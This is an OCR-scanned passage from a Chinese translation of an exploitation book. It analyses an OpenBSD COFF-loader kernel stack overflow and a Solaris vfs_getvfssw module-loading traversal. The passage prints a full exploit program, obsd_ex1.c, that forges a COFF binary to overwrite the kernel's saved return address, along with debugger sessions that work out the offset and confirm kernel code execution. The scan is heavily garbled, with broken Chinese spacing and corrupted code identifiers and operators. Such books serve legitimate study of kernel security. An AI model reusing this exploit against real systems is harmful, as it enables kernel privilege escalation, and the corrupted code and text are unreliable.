* Then, mark the text image busy (so it can be demand paged) or error 
* out if this is not possible. Finally, set up vmcmds for the 

* text, data, bss, and stack segments. 

*/ 


int 
exec ibcs2 coff prep zmagic(p, epp, fp, ap) 
l struct proc *p; 
struct exec_package *epp; 
struct coff_filehdr *fp; 
struct coff_aouthdr *ap; 





int error; 

u_long offset; 

long dsize, baddr, bsize; 
[1] struct coff scnhár sh; 


/* get up command for text segment */ . 
[2a] error = coff find section(p, epp-»ep vp, fp, &sh, COFF STYP TEXT); 


[deleted] 
NEW VMCMD(&epp-»-ep vmcmds, vmcmd map readvn, epp->ep_tsize, 
epp->ep_taddr, epp-»-ep vp, offset, 


VM PROT READ|VM PROT EXECUTE); 


/* get up command for data segment */ 
[25] error = coff find section(p, epp-»ep vp, fp, &sh, COFF STYP DATA); 


[deleted] 


NEW_VMCMD (&epp->ep_vmemds, vmcmd map readvn, 
dsize, epp->ep_daddr, epp->ep_vp, offset, 
VM PROT READ |VM PROT WRITE |VM PROT EXECUTE) H 
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OS Ere ere 


/* set up command for bss segment */ 
[deleted] 


/* load any shared libraries */ 
[2c] error = coff find section(p, epp-»ep vp, fp, &sh, COFF STYP SHLIB); 
if (lerror) ( 
size t resid; 
Struct coff slhdr *slhdr; 
[3] char buf[128], *bufp; /* FIXME */ 
[4] int len = sh.s_size, path_index, entry_len; 


/* DPRINTF(("COFF shlib size %d offset %d\n", 
Sh.s size, sh.s scnptr)); */ 


[5] error = vn rdwr(UIO READ, epp-»ep vp, (caddr t) buf, 
len, sh.s scnptr, 
UIO SYSSPACE, IO NODELOCKED, p-»p ucred, 
&resid, p); 


exec ibcs2 coff prep_zmagic() 函数 负责 为 CoFF ZzMAGIC 类 型 的 二 进 制 文件 建立 执行 环 
境 。 它 被 exec_ibcs2_coff_makecmds () 函数 调用 ， 这 个 函数 检查 给 定 的 文件 是 否 是 coFF 格 式 
的 可 执行 文件 ， 也 检查 魔术 数字 。 魔 术 数 字 将 在 后 面 被 用 来 识别 这 个 特殊 的 、 负责 为 这 个 进程 建 
立 虚拟 内 存 布局 的 处 理 程序 。 在 ZMAGIC 类 型 的 二 进 制 文件 里 ， 处 理 程序 是 exec_ibcs2_coff 
_prep_zmagic() 函数 。 我 们 应 当 提 醒 你 ， 执行 execve 系 统 调用 可 以 获得 这 些 函 数 ， 该 系统 调用 
支持 并 模仿 多 种 可 执行 类 型 ， 例 如 来 自 各 种 基于 UNIX 操 作 系 统 的 ELF、coFF 和 其 他 的 可 执行 格 
式 。 通 过 精心 构造 coFF(zMAGIC 类 型 ) 可 执行 文件 , 可 以 获得 exec_ibcs2_coff_prep_zmagic () 
函数 并 执行 该 函数 。 在 接 下 来 的 章节 里 ， 我 们 将 创建 这 种 类 型 的 可 执行 文件 ， 把 溢出 嵌入 恶意 的 
二 进 制 文件 。 然 而 ， 我 们 要 勇于 超越 自己 ， 首 先 来 讨论 这 个 漏洞 。 

这 个 漏洞 的 代码 路 径 如 下 。 


user mode: 


0x32a54 <execve>: mov $0x3b, eax 
0x32a59 <execvet5>: int $0x80 

| 

| 

V 


kernel mode: . 
[ ISR and initial syscall handler skipped] 


int 

sys_execve(p, v, retval) 
register struct proc *p; 
void *v; 
register_t *retval; 
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[deleted] 
if ((error = check_exec(p, &pack)) != 0) { 
goto freehdr; 
} 
[deleted] 


} 

让 我 们 讨论 一 下 这 段 代 码 里 的 重要 结构 。execsw 数 组 保存 多 种 execsw 结 构 ， 这 些 结构 表示 
各 种 可 执行 文件 的 类 型 。check_exec O 函数 遍历 这 个 数组 ， 并 调用 那些 负责 识别 可 执行 文件 格 
式 的 函数 。es_check 是 函数 指针 ， 是 用 每 个 可 执行 格式 处 理 程序 里 的 可 执行 烙 式 校 验 者 的 地 址 
填充 的 。 

struct execsw { 


u_int es_hdrsz; /* size of header for this format */ 
exec_makecmds_fcn es_check; /* function to check exec format */ 


struct execsw execsw[] = { 
[deleted] 
#ifdef KERN DO ELF . 
{ sizeof(ELf32 Ehdr), exec, elf32 makecmds, }, /* elf binaries */ 
#endif 
[deleted] 
#ifdef COMPAT_IBCS2 
{ COFF HDR SIZE, exec ibcs2 coff makecmds, }, /* coff binaries */ 
[deleted] 


Check exec(p, epp) 
struct proc *p; 
struct exec package *epp; 


[deleted] 
newerror = (*execsw[il.es check) (p, epp); 


青 次 重申 ， 顺 着 代码 执行 路 径 走 一 遍 是 很 有 必要 的 。 这 个 coFF 二 进 制 类 型 将 被 execsw 结 构 
HICOMPAT_IBCS27G WAR, PAB (ex check-exec ibcs2, coff makecmds) 将 逐步 向 exec_ 
ibes2_coff_prep_zmagic () 函数 发 送 zMaGIC () 类 型 的 二 进 制 。 

} 


int 
exec ibcs2 coff makecmds(p, epp) 
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struct proc *p; 
struct exec_package *epp; 


[deleted] 
if (COFF_BADMAG (fp) ) 
return ENOEXEC; 


这 个 宏 检 查 二 进 制 格式 是 否 是 COFF， 如 果 是 ， 继 续 执行 。 


[deleted] 
switch (ap->a_magic) { 
[deleted] 
case COFF ZMAGIC: 
error - exec ibcs2 coff prep zmagic(p, epp, fp, ap); 
break; 
[deleted] 


exec ibcs2 coff prep zmagicí(p, epp, fp, ap) 
struct proc *p; 
struct exec package *epp; 
struct coff filehdr *fp; 
struct coff aouthdr *ap; 


让 我 们 通读 这 个 函数 的 代码 ， 以 便 理解 是 什么 最 终 导致 了 栈 缓冲 区 溢出 。 在 11] 处 ， 我 们 看 
到 coff_scnhdr 为 COFF 二 进 制 的 有 关 区 段 定 义 信息 〈 称 为 区 段 头 部 )， 这 个 结构 被 基于 所 查询 区 
段 类 型 的 coff_find_section() 函数 [2a，2b，2c] 所 填 满 。zMAGIC COFF 二 进 制 被 分 别 分 解 成 
COFF STYP TEXT (.text). COFF_STYP_DATA (.data) #ICOFF_STYP_SHLIB (JERE) 区 段 头 
部 。 在 执行 期 间 ，coff_finG_section() 会 被 调用 几 次 。coff_scnnar 结 构 被 来 自 二 进 制 区 段 
头 部 的 信息 所 填充 ， 区 段 数 据 被 NEW_VMCMD 宏 映射 到 进程 的 虚拟 地 址 空间 。 

现在 ， 与 .text 段 的 区 段 有 关 的 头 部 被 读 进 sh (coff_scnhdar) [2a] 。 对 它 执行 各 种 检查 和 
计算 之 后 ，NEW_VMCMD 宏 把 这 个 区 段 映 射 到 内 存 。 对 .data 段 [2b] 采 取 了 精确 的 步骤 ， 这 将 创建 
另外 的 内 存 领 域 . 第 三 步 读 入 区 段 头 [2c1, 表示 所 有 的 连接 共享 库 , 然后 把 它们 映射 到 可 执行 的 
地 址 空间 ， 每 次 一 个 。 在 表示 .shlib 的 区 段 头 被 读 入 [2c] ， 区 段 的 数据 从 可 执行 的 虚拟 节点 读 
入 。 接 下 来 ， 由 于 从 区 段 头 [4] 获 取 的 大 小 ， 用 只 有 128B [4] 的 静态 酚 缓 冲 区 调用 vn_rdwr () 。 
这 可 能 导致 典型 的 缓冲 区 溢出 。 这 里 真正 发 生 的 是 ,被 读 入 静态 栈 缓冲 区 的 数据 是 基于 用 户 提供 
的 大 小 并 来 自用 户 提供 的 数据 。 

因为 可 以 用 所 有 必需 的 区 段 头 和 最 重要 的 a.shlib 区 段 头 伪造 coFF 二 进 制 , 所 以 可 以 溢出 这 
个 缓冲 区 。 我 们 需要 一 个 大 于 128B 的 长 度 字段 ， 这 就 可 以 粉碎 OpenBSD 栈 ， 获 取 完 全 的 ring 0 
(内 核 模式 ) 来 执行 用 户 提供 的 载荷 。 还 记得 我 们 说 过 的 对 这 个 漏洞 有 些 滑稽 的 攻击 吗 ? 它 就 隐 
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藏 在 [3] ， 在 那里 ， 本 地 内 核 存 储 区 chat buf[128]1 被 声明 为 


/* 


FIXME */ 


有 点 像 鸡尾酒 会 上 的 笑谈 ， 不 过 很 有 趣 。 我 们 希望 OpenBSD 开 发 组 成 员 最 终 可 以 完成 他 们 
很 早 以 前 就 想 做 的 事情 。 

既然 已 经 了 解 了 这 个 漏洞 , 我 们 接 下 来 看 一 个 缺乏 源码 的 操作 系统 漏洞 ， 并 示范 一 些 普通 的 
破解 技术 和 shellcode。 


25.3 Solaris vfs_getvfssw() 可 加 载 内 核 模 块 遍历 漏洞 
再 重申 一 遍 ， 在 深入 研究 漏洞 细节 之 前 ， 我 们 应 该 先 查 看 脆弱 的 代码 ， 了 解 它 做 些 什么 。 


/[* 


* Find a vfssw entry given a file system type name. 
* Try to autoload the filesystem if it's not found. 
* If it's installed, return the vfssw locked to prevent unloading. 


*/ 


struct vfssw * 
vfs getvfssw(char *type) 


{ 


[1] 


[2] 


struct vfssw *vswp; 
Char *modname; 
int rval; 


RLOCK VFSSW(); 
if ((vswp = vfs getvfsswbyname(type)) == NULL) { 
RUNLOCK, VFSSW(); 
WLOCK, VFSSW(); 
if ((vswp = vfs getvfsswbyname(type)) == NULL) { 
if ((vswp = allocate vfssw(type)) == NULL) { 
WUNLOCK VFSSW(); 
return (NULL); 


Y 

4 

WUNLOCK VFSSW(); 
RLOCK VFSSW(); 


modname = vfs to, modname(type): 


* Try to load the filesystem. Before calling modload(), we drop 
* our lock on the VFS switch table, and pick it up after the 

* module is loaded. However, there is a potential race: the 

* module could be unloaded after the call to modload() completes 
* but before we pick up the lock and drive on. Therefore, 

* we keep reloading the module until we've loaded the module 

* and we have the lock on the VFS switch table. 
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*/ 
while (!VFS_INSTALLED(vswp)) ( 
RUNLOCK VFSSW(); 
if (rootdir !- NULL) 
[3] rval - modload("fs", modname); 


[deleted] 
} 


Solaris 操 作 系 统 中 许多 与 内 核 相 关 的 功能 是 用 内 核 模 块 实现 的 ， 在 需要 的 时 候 加 载 。 除 了 核 
心 的 内 核 功能 外 ， 大 部 分 内 核 服 务 都 是 用 动态 内 核 模块 实现 的 ， 其 中 包括 各 种 文件 系统 类 型 。 当 
内 核 接 到 先前 没有 载 入 内 核 空 间 的 文件 系统 的 服务 请 求 时 , 内 核 为 这 个 文件 系统 搜索 可 能 的 动态 
内 核 模块 。 它 从 以 前 记载 的 模块 目录 中 加 载 模 块 ， 因 而 获得 为 这 个 请 求 服务 的 能 力 。 这 个 特殊 的 
漏洞 非常 像 priocnt1 漏 洞 ， 涉 及 哄骗 操作 系统 加 载 用 户 提 供 的 内 核 模块 〈 在 这 个 特殊 的 例子 里 ， 
一 个 模块 代表 一 个 文件 系统 )， 因 此 获得 完全 的 内 核 执 行 权 限 。 

Solaris 内 核 用 Solaris 文 件 系 统 switch 表 记录 加 载 的 文件 系统 。 这 个 表 基 本 上 是 一 个 vfssw_t 


结构 的 数组 。 
typedef struct vfssw { 
char *vsw name; /* type name string */ 
int (*vsw init)(struct vfssw *, int); 
/* init routine */ 
struct vfsops *vsw vfsops; /* filesystem operations vector */ 
int vsw flag; /* flags */ 


} vfssw t; 

vis_getvfissw() 函数 遍历 vfssw[] 数 组 ， 基 于 vsw_name ( 它 是 传递 给 函数 的 type 字 符 串 ) 
搜索 匹配 的 入 口 。 如 果 没 有 发 现 匹 配 的 入 口 ，vfs_getvfssw() 函数 首先 将 在 vfssw[] 数 组 [11] 
里 分 配 一 个 新 进入 点 ， 然 后 调用 变换 函数 [21， 这 个 函数 除了 为 某 些 字符 串 分 析 type 参 数 外 基本 
上 什么 也 没 做 。 在 破解 这 个 漏洞 时 ， 这 个 行为 对 我 们 没什么 影响 。 最 后 ， 它 通过 调用 声名 狼藉 的 
modload žk [3] 自动 加 载 文件 系统 。 

在 内 核 审 计 期 间 ， 我 们 发 现 两 个 Solaris 系 统 调 用 用 用 户 区 提供 的 type 调 用 vfs_getvfssw() 
函数 。 为 了 从 /kernel/fsy/ 目 录 或 /usr/kernel/fsy/ 目 录 加 载 type， 将 把 它 转换 成 模块 和 名。 再 
次 用 简单 的 目录 遍历 技巧 攻击 modload 接 口 ， 我 们 将 得 到 内 核 执行 权限 。 在 审计 期 间 ， 我 们 识别 
并 成 功 地 破解 了 mount 和 sysfs 系 统 调用 将 在 第 26 章 分 析 怎 样 利用 这 个 漏洞 )。 现 在 ， 用 被 用 户 
控制 的 输入 查看 两 个 可 能 导致 vfs_getvfssw() 的 代码 路 径 。 


25.3.4 sysfs() 系统 调用 
sysfs () 系统 调用 是 一 个 到 vfs_getvfssw() 代码 路 径 的 例子 ， 人 允许 用 户 控制 输入 。 


int 
sysfs(int opcode, long al, long a2) 
{ 


int error; 
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switch (opcode) { 
case GETFSIND: 
error = sysfsind((char *)al); 
[deleted] 


| 
| 


V 


static int 
Sysfsind(char *fsname) 
{ 
/* 
* Translate fs identifier to an index into the vfssw structure. 
*/ 
struct vfssw *vswp; 
char fsbuf[FSTYPSZ]; 
int retval; 
Size t len = 0; 


retval - copyinstr(fsname, fsbuf, FSTYPSZ, &len); 
[deleted] 


/* 
* Search the vfssw table for the fs identifier 
* and return the index. 

*/ 

if ((vswp = vfs_getvissw(fsbuf)) !- NULL) ( 


[deleted] 


25.3.2 mount () 系统 调用 
mount () 系统 调用 是 另外 一 个 允许 用 户 控制 输入 的 、 到 vEs_getvfssw() 代码 路 径 的 例子 。 


int 
mount (char *spec, char *dir, int flags, 
char *fstype, char *dataptr, int datalen) 


[deleted] 


ua.spec = spec; 
ua.dir = dir; 
ua.flags = flags; 
ua.fstype = fstype; 
ua.dataptr = dataptr; 
ua.datalen = datalen; 


[deleted] 


error - domount(NULL, &ua, vp, CRED(), &vfsp); 
[deleted] 


V 


int 
domount(char *fsname, struct mounta *uap, vnode t *vp, struct cred 
*credp, 

struct vfs **vfspp) 


{ 


[deleted] 
error = copyinstr(uap->fstype, name, 
FSTYPSZ, &n); 
[deleted] 
if ((vswp - vfs getvfssw(name)) -- NULL) ( 
vn vfsunlock(vp): 
[deleted] 


) 

我 们 必须 承认 ， 我 们 并 没有 检查 所 有 可 能 使 用 vfs_getvfssw() 函 数 的 内 核 接口 ， 但 所 检查 
的 极 有 可 能 就 是 所 有 的 内 核 接口 。 建 议 你 审计 与 modload() 相关 的 问题 ， 可 能 会 发 现 更 多 可 以 利 
用 的 接口 。 


254 小结 


这 章 介绍 了 在 OpenBSD 和 Solaris 里 发 现 新 漏洞 的 方法 。 理 解 内 核 漏洞 是 比较 困难 的 ， 因 此 ， 
我 们 把 真正 的 破解 放 在 下 一 章 讲解 。 我 们 建议 你 在 完全 理解 本 章 介绍 的 概念 和 漏洞 描述 后 ， 再 学 
习 下 一 章 的 内 容 。 

希望 你 在 学 完 本 章 后 能 对 某 些 内 核 漏洞 敏感 。 我 们 把 编写 Solaris 和 OpenBSD 漏 洞 的 破解 代码 
留 在 第 26 章 完成 。 为 了 寻找 更 多 乐趣 ， 翻 开 新 的 一 页 吧 ! 








破解 UNIX 内 核 编 ; 








* 们 在 第 25 章 详细 讨论 了 两 个 内 核 漏 润 在 本 章 将 接着 前 面 的 主题 ， 继 续 讨论 怎样 破解 这 
些 漏洞 。 破 解 漏 洞 特别 是 内 核 漏 洞 时 ， 最 关心 的 是 可 达 性 (reachability)。 在 开始 之 前 ， 
让 我 们 先 看 一 些 曾 在 第 2$ 章 里 描述 的 OpenBSD 漏 洞 为 例 ， 介 绍 一 些 创 新 的 方法 。 


26.1 exec ibcs2 coff _ prep zmagic() 漏 洞 


为 了 触发 exec_ibcs2_coff_prep_zmagic() 中 的 漏洞 , 我 们 需要 伪造 一 个 尽 可 能 小 的 cOFF 
二 进 制 文件 。 本 节 将 讨论 怎样 伪造 这 个 可 执行 文件 。 

我 们 将 会 引入 一 些 与 COPF 有 关 的 结构 ， 并 用 适当 的 数据 填充 它们 ， 然 后 保存 到 伪造 的 coFF 
文件 里 。 为 了 获取 脆弱 的 代码 ， 我 们 上 必须 有 一 些 头 部 (header)， 比 如 说 文件 头 、acut 头 以 及 从 
可 执行 文件 开始 部 分 附加 的 区 段 头 。 如 果 没 有 这 些 区 段 , 前 期 处 理 CoFE 可 执行 文件 的 函数 将 返回 
错误 ， 从 而 导致 我 们 无 法 获取 脆弱 的 函数 一 一 m_rdwr() 。 

伪造 的 最 小 的 coFF 可 执行 文件 的 伪 代 码 如 下 。 


Section Header (.text} 


Section Header (.shlib) 


下 面 的 破解 代码 将 伪造 coFF 可 执行 文件 ， 改 号 保 存 的 返回 地 址 足够 改变 代码 的 执行 路 径 了 。 
有 关 这 个 破解 的 具体 细节 稍 后 会 做 介绍 ， 现 在 ， 我 们 应 该 把 精力 放 在 伪造 coFF 可 执行 文件 上 。 


-~ obsd exi.c ---------~-------------~---------—- 


/** creates a fake COFF executable with large .shlib section size **/ 
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#include <stdio.h> 
#include <sys/types.h> 
#include <fcntl.h> 
#include <unistd.h> 
#include <sys/param.h> 
#include «sys/sysctl.h» 
#include <sys/signal.h> 


unsigned char shellcode[] = 
"\xce\xce"; /* only int3 (debug interrupt) at the moment */ 


#define ZERO(p) memset (&p, 0x00, sizeof (p)) 
/* 
* COFF file header 


*/ 


struct coff_filehdr { 


u_short f_magic; /* magic number */ 

u_short f nscns; /* 4 of sections */ 

long f timdat; /* timestamp */ 

long f symptr; /* file offset of symbol table */ 
long f nsyms; /* 4 of symbol table entries */ 

u Short f opthdr; /* size of optional header */ 

u short f flags; /* flags */ 


he 
/* 上 magic flags */ 
#define COFF MAGIC 1386 Oxl4c 


/* £ flags */ 
#define COFF F, RELFLG Oxi 


#define COFF_F_EXEC 0x2 
#define COFF F LNNO 0x4 
#define COFF, F LSYMS 0x8 
#define COFF_F_SWABD 0x40 


#define COFF F AR16WR 0x80 
#define COFF F AR32WR 0x100 


/* 
* COFF system header 


*/ 


struct coff aouthdr ( 





short a magic; 
short a, vstamp; 
long a tsize; 
long a dsize; 
long a bsize; 


long a entry; 
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long a_tstart; 
long a_dstart; 
de 


/* magic */ 
#define COFF_ZMAGIC 0413 


/* 
* COFF section header 


*/ 


struct coff_scnhdr { 


char s_name [8]; 
long S paddr; 
long S vaddr; 
long S size; 
long S scnptr; 
long S relptr; 
long s lnnoptr; 
u short s nreloc; 
u_short s_ninno; 
long s_flags; 


um 


/* s flags */ 


#define COFF, STYP TEXT 0x20 
#define COFF, STYP DATA 0x40 
#define COFF_STYP_SHLIB 0x800 
int 


main(int argc, char **argv) 
{ 
u_int i, fd, debug = 0; 
u_char *ptr, *shptr; 
u long *lptr, offset; 
char *args[] = { "./ibcs2own", NULL}; 
char *envs[] = { "RIP=theo", NULL}; 
//COFF structures 
Struct coff_filehdr fhdr; 
Struct coff_aouthdr ahdr; 
Struct coff scnhdr  scnO, scnl, scn2; 


if(argv[1]) ( 
if(!strnemp(argv[1], "-v", 2)) 
debug = 1; 
else ( 
printf("-v: verbose flag onlyMn"); 
exit(0); 
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ZERO(fhdr); 

fhdr.f magic = COFF MAGIC, 1386; 

fhdr.f nscns = 3; //TEXT, DATA, SHLIB 

fhdr.f timdat - Oxdeadbeef; 

fhdr.f symptr - 0x4000; 

fhdr.f nsyms - 1; 

fhdr.f opthdr = sizeof(ahdr); //AOUT header size 
fhdr.f flags = COFF F EXEC; 


ZERO(ahdr); 

ahdr.a magic - COFF ZMAGIC; 
ahdr.a tsize - 0; 

ahdr.a dsize - 0; 

ahdr.a bsize - 0; 

ahdr.a entry - 0x10000; 
ahdr.a tstart - 0; 

ahdr.a dstart - 0; 


ZERO(scn0); 
memcpy(&scn0.s name, ".text", 5); 
scnO0.s paddr = 0x10000; 
scn0.s_vaddr = 0x10000; 
scn0.s_size = 4096; 
//file offset of .text segment 
Scn0.s scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof (scn0)*3); 
sen0.s_relptr = 0; 
scnO0.s lnnoptr = 0; 
scn0.s nreloc = 0; 
scn0.s nlnno = 0; 
scn0.s flags - COFF STYP TEXT; 


ZERO(scnl); 
memcpy(&scnl.s name, ".data", 5); 

scnl.s_paddr = 0x10000 - 4096; 

scnl.s_vaddr = 0x10000 - 4096; 

scni.s_size = 4096; 

//file offset of .data segment 

scnl.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof (scn0)*3) + 4096; 
Scni.s relptr = 0; 

scnl.s_innoptr = 0; 

senl.s_nreloc = 0; 

senl.s_ninno = 0; 

scnl.s flags = COFF STYP DATA; 


ZERO(scn2); 
memcpy(&scn2.s name, ".shlib", 6); 





scn2.s paddr = 0; 
scn2.s vaddr - 0; 
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//overflow vector!!! 
scn2.s_size = 0xb0; /* offset from start of buffer to saved eip */ 


//file offset of .shlib segment 

scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof (scn0)*3) + (2*4096); 
scn2.S relptr = 0; 

scn2.s lnnoptr = 0; 

scn2.s, nreloc = 0; 

scn2.s nlnno = 0; 

Scn2.S flags = COFF STYP SHLIB; 


ptr = (char *) malloc(sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0]*3) + X 3*4096]; 
memset(ptr, Oxcc, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0]*3) + 3*4096); 


memcpy(ptr, (char *) &fhdr, sizeof(fhdr]); 
offset - sizeof(fhdr); 


memcpy((char *) (ptr«offset), (char *) &ahdr, sizeof(ahdr)); 
offset += sizeof(ahdr); 


memcpy((char *) (ptrt+offset), (char *) &scen0, sizeof(scn0)); 
offset += sizeof(scn0); 


memcpy((char *) (ptrtoffset), (char *) &scnl, sizeof(scn1)}); 
offset += sizeof(scnl); 


memcpy((char *) (ptr«offset), (char *) &scn2, sizeof(scn2)); 
lptr = (u long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + WX 
(sizeof(scn0)*3) + (2*4096) + OxbO - 8); 


Shptr - (char *) malloc(4096); 
if(debug) 

printf("payload adr: 0x%.8x\n", shptr); 
memset (shptr, Oxcc, 4096); 


*lptr++ = Oxdeadbeef; 
*lptr = (u_long) shptr; 


memcpy(shptr, shellcode, sizeof (shellcode)-1); 
unlink("./ibcs2own"); /* remove the leftovers from prior executions */ 
if((fd = open("./ibcs20wn", O CREAT^O RDWR, 0755)) « O) ( 


perror ("open"); 
exit(-1); 
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write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + (4096*3)); 
close(fd); 
free(ptr); 


execve(args[0], args, envs); 
perror("execve"); 


) 


编译 上 述 代码 : 

bash-2.05b# uname -a 

OpenBSD the0.wideopenbsd.net 3.3 GENERIC#44 i386 
bash-2.05b# gcc -o obsd ex1 obsd_exl.c 


26.1.1. 计算 偏 移 量 和 断 点 
在 运行 内 核 破解 代码 之 前 ， 应 该 先 运行 内 核 调试 器 。 这 样 的 话 ， 为 了 获取 执行 控制 权 ， 可 以 


在 调试 器 里 执行 各 种 计算 。 在 这 个 破解 代码 里 ， 我 们 将 使 用 ddb 内 核 调试 器 。 为 了 确保 ddb 正 确 运 
行 ， 输 入 如 下 命令 。 记 住 ， 为 了 调试 OpenBSD 内 核 ， 应 该 获取 一 定 的 控制 台 访 问 权 。 


bash-2.05b# sysctl -w ddb.panic=1 
ddb.panic: 1 -> 1 

bash-2.05b# sysctl -w ddb.console=1 
ddb.console: 1 -> 1 


第 一 条 sysct1 命 令 配置 .ddb, 使 它 在 检测 到 内 核 不 正常 时 启动 ; 第 二 条 命令 使 我 们 在 任何 时 
候 都 可 以 从 控制 台 用 Esc+Ctrl+Alt 组 合 键 访问 它 。 

bash-2.05b# objdump -d --start-address-0xd048ac78 --stop- 

address=0xd048c000\ 

> /bsd | more 

/bsd: file format a.out-i386-netbsd 


Disassembly of section .text: 


d048ac78 « exec, ibcs2 coff prep zmagic»: 


d048ac78: 55 push %ebp 
d048ac79: 89 e5 mov Sesp,Sebp 
d048ac7b: 81 ec bc 00 00 00 sub $0xbc,$esp 
d048ac81: 57 push sedi 
[deleted] 

d048af5d: c9 leave 

d048af5e: c3 ret 

^C 





bash-2.05b# objdump -d --start-address-0xd048ac78 --stop- 
address=0xd048af5e\ 

> /bsd | grep vn rdwr 

d048aef3: e8 70 1b d7 ff call dOlfca68 « vn rdwr> 
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在 这 个 例子 里 ，0xd048aef3 是 讨厌 的 vn_rqdwr 函 数 的 地 址 。 为 了 计算 已 保存 的 返回 地 址 与 
酚 缓 冲 区 之 间 的 距离 ， 我 们 需要 在 exec_ibcs2_coff_prep_zmagic() 函 数 的 进入 点 (prolog) 
上 以 及 攻击 用 的 vn_rdwr () 函数 上 设置 断 点 。 这 就 可 以 计算 出 base 参 数 与 保存 的 返回 地 址 (也 可 
以 是 保存 的 基 址 指针 ) 之 闻 的 正确 距离 。 


CTRL+ALT+ESC 

bash~2.05b# Stopped at _Debugger+0x4: leave 

ddb> x/i 0xd048ac78 

.exec, ibcs2 coff prep zmagic: pushl %ebp 

ddb> x/i Oxd048aef3 

.exec ibcs2 coff prep zmagic-«0x27b: call Nn, rdwr 
ddb> break 0xd048ac78 

ddb> break 0xd048aef3 

ddb» cont 

^M 


bash-2.05bf ./obsd ex1 


Breakpoint at . exec, ibcs2, coff prep zmagic: pushl Sebp 

ddb> x/x Sesp,1 

0xd4739cSca: d048a6c9 !lsaved return address at: 0xd4739c5c 
ddb» x/i 0xd048a6c9 

exec ibcs2 coff makecmds-«*0x61: movi $eax,S$Sebx 





ddb> x/i 0xd048a6c9 - 5 
.exec ibcs2, coff makecmds«0x5c: call 
.exec ibcs2 coff prep zmagic 





ddb> cont 

Breakpoint at exec ibcs2 coff prep zmagic-40x27b: call 
—vn rdwr 

ddb» x/x S$esp,3 

0xd4739b60: 0 d46c266c d4739bb0 


(base argument to vn rdwr) 
ddb» x/x Sesp 


0xd4739b60: 0 

ddb> ^M 

0xd4739b64: d46c266c 
ddb» ^M 

0xd4739b68: d4739bb0 


|--> addr of ‘char buf[128]' 
ddb> x/x Sebp 


0xd4739c58: d4739c88 --> saved tebp 
ddb» ^M 
Oxd4739c5c: d048a6c9 --> saved $eip 


|-» addr on stack where the saved instruction pointer is stored 

在 x86 调 用 约定 里 (假设 没有 省 略 帧 指针 -fomit-frame-pointer)， 基 址 指针 总 是 指向 栈 上 
的 单元 ,保存 的 《调用 者 的 ) 帧 指针 和 指令 指针 都 保存 在 这 些 单元 内 。 为 了 计算 栈 缓冲 区 和 保存 
的 seip 之 间 的 距离 ， 执 行 如 下 操作 。 
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ddb> print 0xd4739c5c - 0xd4739bb0 
ac 
ddb» boot sync 





注解 boot sync 命 令 将 重启 系统 。 








保存 的 返回 地 址 的 地 址 和 栈 缓冲 区 之 间 的 距离 是 172B (0xac)。 把 .shlib 区 段 头 里 的 区 段 数 
据 大 小 设 为 176 〈0xb0)， 我 们 就 能 控制 保存 的 返回 地 址 。 
26.1.2 ”改写 返回 地 址 并 重 定 向 执行 流程 

在 计算 返回 地 址 相对 于 溢出 的 缓冲 区 的 位 置 之 后 ，obsd_ex1.c 里 的 下 列 代码 行 看 起 来 就 更 
有 意义 了 。 

[1] lptr = (u_long *) ((char *)ptr + sizeof (fhdr) + sizeof(ahdr) + \ 

(sizeof(scn0)*3) + (2*4096) + OxbO - 8); 
[2] shptr = (char *) malloc(4096); 
if (debug) 


printf("payload adr: 0x%.8x\t", shptr); 
memset (shptr, Oxcc, 4096); ` 


*Iptr++ = Oxdeadbeef; 
[3] *lptr = (u long) shptr; 


基本 上 ,在 [1] 里 ,我们 提前 把 lptr 指 针 指 到 区 段 数据 里 的 位 置 ， 这 将 改写 保存 的 基 址 指针 
及 保存 的 返回 地 址 。 在 这 个 操作 之 后 ， 将 分 配 一 个 堆 缓冲 区 [2]， 这 个 缓冲 区 将 被 用 来 存放 内 核 
载荷 (后 面 将 会 对 此 做 出 解释 )。 现 在 ， 将 被 用 于 改写 返回 地 址 的 区 段 数 据 里 的 4B 被 这 个 刚 分 配 
的 用 户 区 堆 缓 冲 区 [3] 的 地 址 更 新 了 。 执 行将 被 钓 住 并 重 定 向 到 用 户 区 的 堆 缓冲 区 ， 而 那里 己 填 
满 了 int 3 (调试 中 断 )。 这 将 导致 ddb 介 入 。 


bash-2.05b# ./obsd exl -v 
payload adr: 0x00005000 


Stopped at 0x5001: int $3 
ddb> x/i Seip,3 

0x5001: int $3 

0x5002: int $3 

0x5003: int $3 


来 自 内 核 调 试 器 的 输出 显示 出 我 们 得 到 了 内 核 的 全 部 执行 控制 特权 〈SEL_KPL)。 


ddb> show registers 


es 0x10 

ds 0x10 

ebp Oxdeadbeef 

eip 0x5001 --> user-land address 


cS 0x8 
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26.1.3 ”查找 进程 描述 符 〈 或 进程 结构 ) 

通过 下 列 操 作 ， 我 们 可 以 搜集 凭证 〈 证 书 》 和 chroot 处 理 载荷 时 所 需要 的 进程 结构 信息 。 查 
找 进 程 结 构 的 方法 有 很 多 种 。 在 这 部 分 我 们 只 考虑 两 个 方法 ， 一 个 是 栈 查 找 方 法 〈 不 推荐 在 
OpenBSD 上 使 用 )， 另 一 个 是 sysctL() 系 统 调用 。 

1. 栈 查找 

在 OpenBSD 内 核 里 ， 依 靠 脆 弱 的 接口 ， 进 程 结构 指针 相对 于 栈 指针 来 说 可 能 在 一 个 固定 的 
地 方 。 因 此 ,在 获取 执行 控制 权 后 ， 可 以 把 栈 指针 加 上 固定 偏 移 量 〈 栈 指针 和 进程 结构 指针 位 置 
之 间 的 增 量 ) 来 重新 找 回 指向 进程 结构 的 指针 。 另 一 方面 ， 在 Linux 下， 内 核 总 是 把 进程 结构 映 
射 到 每 个 进程 (per-process〉 内 核 栈 的 开头 。Linux 的 这 个 特征 使 查找 进程 结构 变 得 更 直接 。 

2. sysct1() 系统 调用 

sysct1 是 在 用 户 区 下 得 到 / 设置 内 核 信 息 的 系统 调用 。 它 有 一 个 简单 的 接口 ， 用 于 在 内 核 
与 用 户 区 之 间 来 回 传递 数据 。sysct1 接 口 被 结构 化 到 一 些 子 部 件 中 〈sub-components)， 这 些 子 
部 件 包 括 内 核 、 硬 件 、 虚 拟 内 存 、 网 络 、 文 件 系 统 和 体系 结构 系统 控制 接口 。 我 们 应 该 把 精力 放 
